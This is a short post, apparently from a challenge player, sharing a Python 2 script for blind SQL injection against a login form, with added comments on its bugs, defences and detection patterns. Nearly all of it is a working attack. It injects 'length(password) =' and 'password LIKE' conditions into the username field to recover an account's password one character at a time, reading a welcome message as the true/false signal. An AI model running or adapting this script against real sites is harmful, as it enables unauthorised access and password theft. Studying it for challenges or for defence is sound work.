Today I would like to show you my own Blind SQL Injection script, which is written in Python.
I needed the script for one of the Web Server challenges from the hidden challenge.
# Python 2 script (urllib2, xrange, print statements, optparse): it will not run
# unmodified under Python 3.
#
# The only signal the script relies on is a difference in the HTTP response body
# (`resp` present or absent), i.e. a boolean oracle on a login endpoint. From a
# defender's view the relevant controls are parameterised queries on the server
# and a login response that does not vary with the outcome of an injected
# condition; from a detection view the traffic is a burst of POSTs to the same
# endpoint whose `username` field carries the fragments "' AND length(password) ="
# and "' AND password LIKE '" with a trailing "-- -" comment.
import urllib2
import urllib
import optparse
import os

# Candidate characters tried at each password position. NOTE: this shadows the
# builtin `dict`; the name is used below as a plain string, never as a mapping.
# The `\=` sequence is not a valid escape in Python 2 and stays as two characters.
dict = "abecdsfghjklmnpqtuvxyzerio1234567890!@$^&*()+|}{:?><,./;'[]\=-"
# Substring whose presence in the response body is taken as "condition true".
resp = 'Welcome back admin !'
# Module-level mutable state shared by bruteforcer(): `tab` holds the current
# guess (one char per position), `passw` the characters confirmed so far.
tab = []
passw = []

def bruteforcer(username,length):
    """Recover `length` characters of the password for `username`, one position at a time.

    For every position x and every candidate character, the current guess is
    placed into the username field as a LIKE-prefix condition and POSTed to
    'hidden_url' (apparently a placeholder left by the author, not a real URL).
    Confirmed characters are appended to the module-level `passw` list.

    Args:
        username: account name inserted verbatim into the injected condition.
        length:   number of positions to recover; converted with int().

    Returns:
        The joined contents of `passw` as a str (may be shorter than `length`
        if a position matched no candidate).
    """
    for x in xrange(0,int(length)):
        for i in xrange(0,len(dict)):
            # Shells out to clear the terminal on every single attempt.
            os.system('clear')
            tab.append(dict[i])
            inj = "".join(tab)
            # String-built condition; the username is not escaped in any way.
            injection = username + "' AND password LIKE '" + inj + "%' -- -"
            print inj
            payload = urllib.urlencode({"username": injection, "password": "someth"})
            r = urllib2.urlopen('hidden_url', payload)
            if resp in r.read():
                # list.append() returns None, so `k` is always None and is never read.
                k = passw.append(tab[x])
                break
            else:
                # Drop the rejected character before trying the next candidate.
                del tab[x]
    found = "".join(passw)
    print '[+] progress ' + found
    return found

def len_finder(username):
    """Find the password length for `username` by testing `length(password) = i` for i in 0..98.

    Args:
        username: account name inserted verbatim into the injected condition;
                  a None value (no -u given) raises TypeError on concatenation.

    Returns:
        The first i whose response contains `resp`, or None implicitly if no
        value in 0..98 matches (the caller then passes None to bruteforcer).
    """
    for i in xrange(0,99):
        inject = username + "' AND length(password) = " + str(i) + "-- -"
        payload = urllib.urlencode({"username": inject, "password": "someth"})
        r = urllib2.urlopen('hidden_url', payload)
        if resp in r.read():
            print "Password length for " + username + " is " + str(i)
            return i
            # Unreachable: the return above already leaves the function.
            break

def main():
    """Parse `-u <username>` from the command line, then run len_finder() and bruteforcer()."""
    parser = optparse.OptionParser("-u <username>")
    parser.add_option("-u", dest = "username", type = "string", help = "set up username")
    (options,args) = parser.parse_args()
    # optparse does not enforce -u; without it `username` is None.
    username = options.username
    length = len_finder(username)
    print bruteforcer(username,length)

if __name__ == '__main__':
    main()